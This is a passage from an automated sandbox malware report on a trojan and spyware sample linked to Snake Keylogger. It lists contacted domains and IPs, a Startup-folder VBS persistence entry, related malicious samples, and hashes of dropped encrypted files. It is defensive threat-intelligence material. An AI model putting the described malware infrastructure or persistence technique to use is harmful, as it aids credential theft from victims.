0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/102.129.152.231$	RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://scratchdreams.tk	RegSvcs.exe, 00000007.00000002.4088699250.000000000270E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029C1000.00000004.00000800.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/	name.exe, 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
104.21.27.85	scratchdreams.tk	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1422242
Start date and time:	2024-04-08 13:56:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PsBygexGwH.exe renamed because original name is a hash value
Original Sample Name:	f36cebf205cb95b23bea11f15356461b51b40cd0bd586e5c5f151a6396a6151a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/10@3/3
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 99% Number of executed functions: 56 Number of non-executed functions: 300
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 3844 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:59:12	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
13:59:15	API Interceptor	1420662x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
158.101.44.242	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	checkip.dyndns.org/
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	Hitomi Downloader.exe	Get hash	malicious	Agent Tesla, AgentTesla, RisePro Stealer	Browse	checkip.dyndns.org/
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ATM Dekont E-Maili pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	Halkbank_Ekstre_20240312_081829_752731.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Contract.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	Q88 09284823910.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
172.67.177.134	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse
104.21.27.85	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	VI3 Operation Guide_tech Info versionfdp.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.8.169
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	158.101.44.242
	request-2.doc.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.8.169
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.247.73
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
scratchdreams.tk	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
reallyfreegeoip.org	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	acZPG2kRsL.elf	Get hash	malicious	Mirai	Browse	132.145.48.205
	kIUmnxfdLQ.elf	Get hash	malicious	Mirai	Browse	193.123.7.164
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	https://letg.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword	Get hash	malicious	HTMLPhisher	Browse	150.136.26.45
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	158.101.44.242
	https://objectstorage.sa-saopaulo-1.oraclecloud.com/n/grnf1myuo7lg/b/bucket-20240402-0423/o/indexsmoke.html	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	134.70.84.3
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	mrPTE618YB.exe	Get hash	malicious	PureLog Stealer	Browse	150.136.132.149
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
CLOUDFLARENETUS	7mIgg1hm7Q.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	Gh9nbkn2Q6.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	4N8BNeFRkZ.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://www.canva.com/design/DAFgnbl60Ls/hLJisMAwxDjPFHzhh8Zhhw/view?utm_content=DAFgnbl60Ls&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink	Get hash	malicious	Unknown	Browse	104.16.103.112
	glU9DsYtYY.exe	Get hash	malicious	Dridex Dropper, RisePro Stealer	Browse	104.26.5.15
	http://midjourney.co	Get hash	malicious	Unknown	Browse	104.17.2.184
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	DHL 986022_pdf.vbs	Get hash	malicious	FormBook	Browse	172.67.215.45
	EUR 17252,8 20240403.vbs	Get hash	malicious	Remcos	Browse	172.67.215.45
	UPS 984645.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
CLOUDFLARENETUS	7mIgg1hm7Q.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	Gh9nbkn2Q6.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	4N8BNeFRkZ.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://www.canva.com/design/DAFgnbl60Ls/hLJisMAwxDjPFHzhh8Zhhw/view?utm_content=DAFgnbl60Ls&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink	Get hash	malicious	Unknown	Browse	104.16.103.112
	glU9DsYtYY.exe	Get hash	malicious	Dridex Dropper, RisePro Stealer	Browse	104.26.5.15
	http://midjourney.co	Get hash	malicious	Unknown	Browse	104.17.2.184
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	DHL 986022_pdf.vbs	Get hash	malicious	FormBook	Browse	172.67.215.45
	EUR 17252,8 20240403.vbs	Get hash	malicious	Remcos	Browse	172.67.215.45
	UPS 984645.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	VI3 Operation Guide_tech Info versionfdp.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.177.134
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	file.exe	Get hash	malicious	SmokeLoader, Xehook Stealer	Browse	172.67.177.134
	request-2.doc.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.177.134
	https://my.visme.co/view/w46vn911-northshore-tractor-ltd	Get hash	malicious	Unknown	Browse	172.67.177.134
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	TbwzlHMTM0.exe	Get hash	malicious	Unknown	Browse	104.21.27.85
	Gh9nbkn2Q6.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	TbwzlHMTM0.exe	Get hash	malicious	Unknown	Browse	104.21.27.85
	4N8BNeFRkZ.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	https://wix-l.in/k-F53x0v7F	Get hash	malicious	Unknown	Browse	104.21.27.85
	Lebenslauf Till Martin B#U00e4hringer.docx - Google Docs(1).htm	Get hash	malicious	Unknown	Browse	104.21.27.85
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	shipping documents.vbs	Get hash	malicious	FormBook, GuLoader	Browse	104.21.27.85
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	DHL 986022_pdf.vbs	Get hash	malicious	FormBook	Browse	104.21.27.85

Process:	C:\Users\user\Desktop\PsBygexGwH.exe
File Type:	data
Category:	dropped
Size (bytes):	104292
Entropy (8bit):	7.941208599431399
Encrypted:	false
SSDEEP:	3072:9Sfybq8aByxl/fO6XV7VmuD/3QcfaiSebeefOgwpN:9H9EEl/fH/gKaiRbbfKpN
MD5:	814097FD9BBB82AAD3FDE173805F64BD
SHA1:	45B4AB185ACE33B687C48082617F0E1CD89EA2A6
SHA-256:	1ECC36DB3051954AD5D96501C004AA6560D0B5FDF3F7420BADE23C632774F6BF
SHA-512:	CA8B68FDC1D1FD0D6A4393EC96C7BF7B1DBC446E336CC260AE9C1122C8F94D1180AAEA7636BB2C4E8581EB868F82C30C523AF1CA84BCA95ABFE79D4A6F8F9FE3
Malicious:	false
Reputation:	low
Preview:	EA06.......3j]Z.D..jt.o..8..g...f.K.U&.U2s9.R..J...R.V..p.....q...)........ox.47....gs...-...H..o/.M..9\.)(..l5...;..^'5.4..4.O-....\kS.].w1.Tqr..\|.z....X...:i.jqS.t.V.V.P.@..Z..tFi5;H..:..g..9..WjCF..j ....=..J.X.I..YL.F.t.../.J,...:m.J......B..../..E..T. ..kQJ....u.$.A.....]".I....:..cW.W.l4J..;.. ...B.tZ.UI.@.t....>...c...%.I.V.J...1j...K..'......9..W\|.z.....W'sjm[;d.Rt{....:jf5Z...Y.c...@..ti:i.'..I.....Sgs..:.I.:...........tG...`..w..$.....\....@.r...D@..0..Z.t'.....c.U&...s;.Zj..uf..\&........4..{m@.S'...".K.V.5:l.#Z.Sx D.vCm.U'.}2s=.D..-.>.S..kv9...8.j.J]b...R.....\......2.N+..........RsQ..f.....S..5).jd..F.u..<.\.Z&R...}..sz.&.0..-.:4..Y.X+.....Gi....."^f..5...../..5.mB.Y.18....X.v;..8..bs......&.k.'[.N...$..<......8..`.]z...R.Q..B...Vi5.}..Z.[.s..~.P.Im...:{D.R.[t>.Q.[&...8........6.R..y.z..~\...(....Pg.[...I.Pd.U:w:......n......6.:..).]j.5...2..@.T.P.....I.^K..Z...`/$N!H.P.2......N...X.Cm........T.r.4.........`../..T...9j.::

C:\Users\user\AppData\Local\Temp\aut1029.tmp

Download File

Process:	C:\Users\user\Desktop\PsBygexGwH.exe
File Type:	data
Category:	dropped
Size (bytes):	10102
Entropy (8bit):	7.593118334351576
Encrypted:	false
SSDEEP:	192:QNAVE5Le06Tr+mPg5aV719N2wkCKltkRcLihNLpxJFdu63kKxvD/MIFnY7N:QNAQe06f+mBV71ewkRnihhJX0KxBFnGN
MD5:	F7F3CDD23C6186501A42F72D606BC7AC
SHA1:	7764AB12BFC2A588BECC07D9D24B020F36E7568C
SHA-256:	16CCD30B291DA4E7DB7EFFFE3781896E9C028456531D9CD24C824998155861B6
SHA-512:	A4B1495081555E702B015F3D436EFC494E475A8B39CB38285656A4B939075F9FA5553BD08DBF0F051D7CC4112DA08779E77352F21ACB35CA0643425E2B40ACA9
Malicious:	false
Reputation:	low
Preview:	EA06..t..Nh3*,.5......7..&TY..k5.X..9...c....)...5.Mf.)......&.i..s4..&.)..j.%. ..a......N...(...a.6.,v+....m.YlS........s3.Z...9.X.3 ...f....a4.6.&.........6\|s...gc.0....T...4.Y..`...k....l.1../.q5.N..2....$......x. ..$h.3.....#`...Mf...L.d.!...Mf.....' .Y...n.....0.N&.....d.U..&.<...l.U..'.5_....U..,`5_....U..f.5_..d.U.(..1......V...Nf.`..N&.`..M.^....j.7..$zn.....r..... !..Y&.G[....A6...f../.n.u.M.`>_L........)@...[..a6...z.2.... =........K<.l...$..6.{......0......r\|3K%....L.6>....4...l......_......4\|.+(.7.c...\|3K%.d....f.9....c..i\|v0F...a.l.,`.\..lsy...4.Y.o...mc..,s.$.k3.....f...`.....fcb..l.i....l..np..Y.....M..14.X@..4.......7d.N..;c...,.8.'.!....@!....f .....0.......Brb.....f.)...b..@!...g,. ....36.M&V`.......vd.....l3.,...B.B3p.N...;3.X..Q7...&..8.....f`...M.'I...x..C.....,vh...4.c9.L..@....`...g.,58..,.+..E3.....c.P..Y,3.....`Nf...N.@.;5.X.c9.w.!....f......n...X@A.$...`...g..38.X..I..(...Xl.b.,...#V9..s9..@!...Gf.....,fac.Y' !@.#5.....c........$....~

C:\Users\user\AppData\Local\Temp\aut1FED.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	104292
Entropy (8bit):	7.941208599431399
Encrypted:	false
SSDEEP:	3072:9Sfybq8aByxl/fO6XV7VmuD/3QcfaiSebeefOgwpN:9H9EEl/fH/gKaiRbbfKpN
MD5:	814097FD9BBB82AAD3FDE173805F64BD
SHA1:	45B4AB185ACE33B687C48082617F0E1CD89EA2A6
SHA-256:	1ECC36DB3051954AD5D96501C004AA6560D0B5FDF3F7420BADE23C632774F6BF
SHA-512:	CA8B68FDC1D1FD0D6A4393EC96C7BF7B1DBC446E336CC260AE9C1122C8F94D1180AAEA7636BB2C4E8581EB868F82C30C523AF1CA84BCA95ABFE79D4A6F8F9FE3
Malicious:	false
Reputation:	low
Preview:	EA06.......3j]Z.D..jt.o..8..g...f.K.U&.U2s9.R..J...R.V..p.....q...)........ox.47....gs...-...H..o/.M..9\.)(..l5...;..^'5.4..4.O-....\kS.].w1.Tqr..\|.z....X...:i.jqS.t.V.V.P.@..Z..tFi5;H..:..g..9..WjCF..j ....=..J.X.I..YL.F.t.../.J,...:m.J......B..../..E..T. ..kQJ....u.$.A.....]".I....:..cW.W.l4J..;.. ...B.tZ.UI.@.t....>...c...%.I.V.J...1j...K..'......9..W\|.z.....W'sjm[;d.Rt{....:jf5Z...Y.c...@..ti:i.'..I.....Sgs..:.I.:...........tG...`..w..$.....\....@.r...D@..0..Z.t'.....c.U&...s;.Zj..uf..\&........4..{m@.S'...".K.V.5:l.#Z.Sx D.vCm.U'.}2s=.D..-.>.S..kv9...8.j.J]b...R.....\......2.N+..........RsQ..f.....S..5).jd..F.u..<.\.Z&R...}..sz.&.0..-.:4..Y.X+.....Gi....."^f..5...../..5.mB.Y.18....X.v;..8..bs......&.k.'[.N...$..<......8..`.]z...R.Q..B...Vi5.}..Z.[.s..~.P.Im...:{D.R.[t>.Q.[&...8........6.R..y.z..~\...(....Pg.[...I.Pd.U:w:......n......6.:..).]j.5...2..@.T.P.....I.^K..Z...`/$N!H.P.2......N...X.Cm........T.r.4.........`../..T...9j.::

C:\Users\user\AppData\Local\Temp\aut201D.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	10102
Entropy (8bit):	7.593118334351576
Encrypted:	false
SSDEEP:	192:QNAVE5Le06Tr+mPg5aV719N2wkCKltkRcLihNLpxJFdu63kKxvD/MIFnY7N:QNAQe06f+mBV71ewkRnihhJX0KxBFnGN
MD5:	F7F3CDD23C6186501A42F72D606BC7AC
SHA1:	7764AB12BFC2A588BECC07D9D24B020F36E7568C
SHA-256:	16CCD30B291DA4E7DB7EFFFE3781896E9C028456531D9CD24C824998155861B6
SHA-512:	A4B1495081555E702B015F3D436EFC494E475A8B39CB38285656A4B939075F9FA5553BD08DBF0F051D7CC4112DA08779E77352F21ACB35CA0643425E2B40ACA9
Malicious:	false
Reputation:	low
Preview:	EA06..t..Nh3*,.5......7..&TY..k5.X..9...c....)...5.Mf.)......&.i..s4..&.)..j.%. ..a......N...(...a.6.,v+....m.YlS........s3.Z...9.X.3 ...f....a4.6.&.........6\|s...gc.0....T...4.Y..`...k....l.1../.q5.N..2....$......x. ..$h.3.....#`...Mf...L.d.!...Mf.....' .Y...n.....0.N&.....d.U..&.<...l.U..'.5_....U..,`5_....U..f.5_..d.U.(..1......V...Nf.`..N&.`..M.^....j.7..$zn.....r..... !..Y&.G[....A6...f../.n.u.M.`>_L........)@...[..a6...z.2.... =........K<.l...$..6.{......0......r\|3K%....L.6>....4...l......_......4\|.+(.7.c...\|3K%.d....f.9....c..i\|v0F...a.l.,`.\..lsy...4.Y.o...mc..,s.$.k3.....f...`.....fcb..l.i....l..np..Y.....M..14.X@..4.......7d.N..;c...,.8.'.!....@!....f .....0.......Brb.....f.)...b..@!...g,. ....36.M&V`.......vd.....l3.,...B.B3p.N...;3.X..Q7...&..8.....f`...M.'I...x..C.....,vh...4.c9.L..@....`...g.,58..,.+..E3.....c.P..Y,3.....`Nf...N.@.;5.X.c9.w.!....f......n...X@A.$...`...g..38.X..I..(...Xl.b.,...#V9..s9..@!...Gf.....,fac.Y' !@.#5.....c........$....~

C:\Users\user\AppData\Local\Temp\aut52C5.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	104292
Entropy (8bit):	7.941208599431399
Encrypted:	false
SSDEEP:	3072:9Sfybq8aByxl/fO6XV7VmuD/3QcfaiSebeefOgwpN:9H9EEl/fH/gKaiRbbfKpN
MD5:	814097FD9BBB82AAD3FDE173805F64BD
SHA1:	45B4AB185ACE33B687C48082617F0E1CD89EA2A6
SHA-256:	1ECC36DB3051954AD5D96501C004AA6560D0B5FDF3F7420BADE23C632774F6BF
SHA-512:	CA8B68FDC1D1FD0D6A4393EC96C7BF7B1DBC446E336CC260AE9C1122C8F94D1180AAEA7636BB2C4E8581EB868F82C30C523AF1CA84BCA95ABFE79D4A6F8F9FE3
Malicious:	false
Reputation:	low
Preview:	EA06.......3j]Z.D..jt.o..8..g...f.K.U&.U2s9.R..J...R.V..p.....q...)........ox.47....gs...-...H..o/.M..9\.)(..l5...;..^'5.4..4.O-....\kS.].w1.Tqr..\|.z....X...:i.jqS.t.V.V.P.@..Z..tFi5;H..:..g..9..WjCF..j ....=..J.X.I..YL.F.t.../.J,...:m.J......B..../..E..T. ..kQJ....u.$.A.....]".I....:..cW.W.l4J..;.. ...B.tZ.UI.@.t....>...c...%.I.V.J...1j...K..'......9..W\|.z.....W'sjm[;d.Rt{....:jf5Z...Y.c...@..ti:i.'..I.....Sgs..:.I.:...........tG...`..w..$.....\....@.r...D@..0..Z.t'.....c.U&...s;.Zj..uf..\&........4..{m@.S'...".K.V.5:l.#Z.Sx D.vCm.U'.}2s=.D..-.>.S..kv9...8.j.J]b...R.....\......2.N+..........RsQ..f.....S..5).jd..F.u..<.\.Z&R...}..sz.&.0..-.:4..Y.X+.....Gi....."^f..5...../..5.mB.Y.18....X.v;..8..bs......&.k.'[.N...$..<......8..`.]z...R.Q..B...Vi5.}..Z.[.s..~.P.Im...:{D.R.[t>.Q.[&...8........6.R..y.z..~\...(....Pg.[...I.Pd.U:w:......n......6.:..).]j.5...2..@.T.P.....I.^K..Z...`/$N!H.P.2......N...X.Cm........T.r.4.........`../..T...9j.::

C:\Users\user\AppData\Local\Temp\aut5324.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	10102
Entropy (8bit):	7.593118334351576
Encrypted:	false
SSDEEP:	192:QNAVE5Le06Tr+mPg5aV719N2wkCKltkRcLihNLpxJFdu63kKxvD/MIFnY7N:QNAQe06f+mBV71ewkRnihhJX0KxBFnGN
MD5:	F7F3CDD23C6186501A42F72D606BC7AC
SHA1:	7764AB12BFC2A588BECC07D9D24B020F36E7568C
SHA-256:	16CCD30B291DA4E7DB7EFFFE3781896E9C028456531D9CD24C824998155861B6
SHA-512:	A4B1495081555E702B015F3D436EFC494E475A8B39CB38285656A4B939075F9FA5553BD08DBF0F051D7CC4112DA08779E77352F21ACB35CA0643425E2B40ACA9
Malicious:	false
Reputation:	low
Preview:	EA06..t..Nh3*,.5......7..&TY..k5.X..9...c....)...5.Mf.)......&.i..s4..&.)..j.%. ..a......N...(...a.6.,v+....m.YlS........s3.Z...9.X.3 ...f....a4.6.&.........6\|s...gc.0....T...4.Y..`...k....l.1../.q5.N..2....$......x. ..$h.3.....#`...Mf...L.d.!...Mf.....' .Y...n.....0.N&.....d.U..&.<...l.U..'.5_....U..,`5_....U..f.5_..d.U.(..1......V...Nf.`..N&.`..M.^....j.7..$zn.....r..... !..Y&.G[....A6...f../.n.u.M.`>_L........)@...[..a6...z.2.... =........K<.l...$..6.{......0......r\|3K%....L.6>....4...l......_......4\|.+(.7.c...\|3K%.d....f.9....c..i\|v0F...a.l.,`.\..lsy...4.Y.o...mc..,s.$.k3.....f...`.....fcb..l.i....l..np..Y.....M..14.X@..4.......7d.N..;c...,.8.'.!....@!....f .....0.......Brb.....f.)...b..@!...g,. ....36.M&V`.......vd.....l3.,...B.B3p.N...;3.X..Q7...&..8.....f`...M.'I...x..C.....,vh...4.c9.L..@....`...g.,58..,.+..E3.....c.P..Y,3.....`Nf...N.@.;5.X.c9.w.!....f......n...X@A.$...`...g..38.X..I..(...Xl.b.,...#V9..s9..@!...Gf.....,fac.Y' !@.#5.....c........$....~

C:\Users\user\AppData\Local\Temp\contrapose

Download File

Process:	C:\Users\user\Desktop\PsBygexGwH.exe
